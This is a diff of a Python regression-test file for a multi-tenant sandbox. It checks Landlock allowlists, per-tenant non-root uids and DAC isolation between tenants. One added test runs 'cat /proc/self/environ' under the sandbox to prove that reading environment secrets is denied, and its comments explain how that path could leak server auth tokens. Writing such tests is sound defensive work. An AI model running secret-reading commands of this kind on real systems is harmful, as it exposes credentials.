+  - test_posix_drops_root_and_applies_rlimits — per-tenant non-root uid, NPROC
+    rlimit, DAC blocks a root-owned write (OSMCP_SANDBOX=posix).
   - test_full_tier_blocks_read_escape_and_network — Landlock blocks reading a
     world-readable file outside the run dir, blocks writing outside it, and
     seccomp blocks outbound IP networking (OSMCP_SANDBOX=auto), while the run
@@ -39,6 +39,7 @@
 """
 import asyncio
 import os
+import re
 import shutil
 import socket
 import subprocess
@@ -402,9 +403,15 @@ async def _run():
 
     info = asyncio.run(_run())
 
-    # --- Assert: privilege dropped, rlimit applied, DAC blocks the escape write ---
-    assert "PROBE uid=1001" in info, f"measure should drop to sandbox uid 1001; info=\n{info}"
-    assert "PROBE uid=0" not in info, "measure must not run as root under posix"
+    # --- Assert: privilege dropped to a per-tenant uid, rlimit applied, DAC blocks
+    # the escape write. The HTTP fixture is session-keyed, so the measure drops to a
+    # derived per-tenant uid (M1/M2), not the shared base 1001. ---
+    m = re.search(r"PROBE uid=(\d+)", info)
+    assert m, f"probe must report uid; info=\n{info}"
+    uid = int(m.group(1))
+    assert uid != 0, "measure must not run as root under posix"
+    assert 2000 <= uid < 62000, \
+        f"HTTP tenant must drop to a per-tenant sandbox uid (2000..61999), got {uid}; info=\n{info}"
     assert "PROBE nproc=1024" in info, f"NPROC rlimit (1024) should be applied; info=\n{info}"
     assert "PROBE write_err=" in info, \
         f"write to root-owned /opt should be denied under posix; info=\n{info}"
@@ -788,10 +795,16 @@ async def _run():
             return "\n".join(res.get("runner_messages", {}).get("info", []))
 
     info = asyncio.run(_run())
-    assert "PROBE uid=0" not in info, \
-        f"H5: measure must NOT run as root with OSMCP_SANDBOX_UID=0; info=\n{info}"
-    assert "PROBE uid=1001" in info, \
-        f"H5: sandbox uid must clamp to the safe default 1001; info=\n{info}"
+    # OSMCP_SANDBOX_UID=0 must never yield a root-running measure. The base-uid
+    # clamp is unit-tested (test_sandbox_uid_zero_clamped); this HTTP fixture is
+    # session-keyed, so the measure drops to a per-tenant derived uid (also never
+    # root) regardless of the bad base override.
+    m = re.search(r"PROBE uid=(\d+)", info)
+    assert m, f"H5: probe must report uid; info=\n{info}"
+    uid = int(m.group(1))
+    assert uid != 0, f"H5: measure must NOT run as root with OSMCP_SANDBOX_UID=0; info=\n{info}"
+    assert 2000 <= uid < 62000, \
+        f"H5: confined code must run as a non-root per-tenant uid, got {uid}; info=\n{info}"
 
 
 def test_unknown_sandbox_mode_fails_closed():
@@ -885,6 +898,69 @@ def test_test_measure_does_not_mutate_shared_source(tmp_path, monkeypatch):
         "shared measure source/tests was mutated"
 
 
+def test_proc_not_in_landlock_ro_allowlist():
+    # Regression (H1): /proc was a Landlock RO root, so a confined measure could
+    # read /proc/<pid>/environ. On a non-root server (measure uid == server uid)
+    # that recovers the server secrets clean-env stripped — incl. HTTP auth
+    # tokens. /proc must NOT be granted; Landlock then denies it for everyone.
+    from mcp_server import sandbox
+    ro = sandbox._ro_paths()
+    assert "/proc" not in ro, f"/proc must not be a Landlock RO root (H1): {ro}"
+
+
+def test_full_tier_denies_proc_environ_read():
+    # Regression (H1, dual-proof): with /proc granted, a confined process could
+    # read /proc/self/environ (DAC always allows self) — the same surface that
+    # leaks /proc/<server>/environ on a non-root server. Built via the REAL
+    # wrap_cmd so it tracks the actual allowlist; the read must now be DENIED.
+    from mcp_server import sandbox
+    if sandbox.active_tier() != "landlock":
+        pytest.skip("needs full tier (OSMCP_SANDBOX=auto)")
+    workdir = tempfile.mkdtemp()
+    cmd = sandbox.wrap_cmd(["cat", "/proc/self/environ"], workdir)
+    try:
+        proc = subprocess.run(  # noqa: S603 - fixed argv, no shell
+            cmd, capture_output=True, text=True, cwd="/repo",
+            user=1001, group=1001, check=False,
+        )
+        out = (proc.stdout + proc.stderr).lower()
+        assert proc.returncode != 0, f"/proc read must be denied (H1); rc=0 out={out[:200]}"
+        assert ("denied" in out or "no such" in out
+                or "operation not permitted" in out), f"expected denial; out={out[:300]}"
+    finally:
+        shutil.rmtree(workdir, ignore_errors=True)
+
+
+def test_per_tenant_uid_gives_dac_isolation():
+    # Regression (M2): every tenant shared uid 1001, so in the posix tier (no
+    # Landlock) tenant B could read tenant A's run files by plain DAC. Per-tenant
+    # uids restore DAC isolation — a 0600 file owned by tenant A's uid is
+    # unreadable by tenant B's uid, with no Landlock involved.
+    from mcp_server import config
+    uid_a = config._derive_tenant_uid("tenantA")
+    uid_b = config._derive_tenant_uid("tenantB")
+    assert uid_a != uid_b, "distinct tenants must derive distinct uids"
+    d = Path(tempfile.mkdtemp())
+    try:
+        secret = d / "modelA.osm"
+        secret.write_text("TENANT_A_PRIVATE")
+        os.chown(secret, uid_a, uid_a)
+        secret.chmod(0o600)
+        # dir must be traversable so the denial proven is the file's, not the dir's
+        d.chmod(0o755)
+        # absolute path (no PATH lookup), fixed argv, no shell
+        proc = subprocess.run(  # noqa: S603
+            ["/bin/cat", str(secret)],
+            capture_output=True, text=True,
+            user=uid_b, group=uid_b, check=False,
+        )
+        out = (proc.stdout + proc.stderr).lower()
+        assert proc.returncode != 0, f"tenant B must not read tenant A's 0600 file; rc=0 out={out}"
+        assert "permission denied" in out, f"expected DAC denial; out={out}"
+    finally:
+        shutil.rmtree(d, ignore_errors=True)
+
+
 def test_input_root_not_in_landlock_ro_allowlist():
     # Regression (Codex #5): /inputs (INPUT_ROOT) is a SHARED multi-tenant dir;
     # granting it read in the Landlock policy let one tenant's confined measure read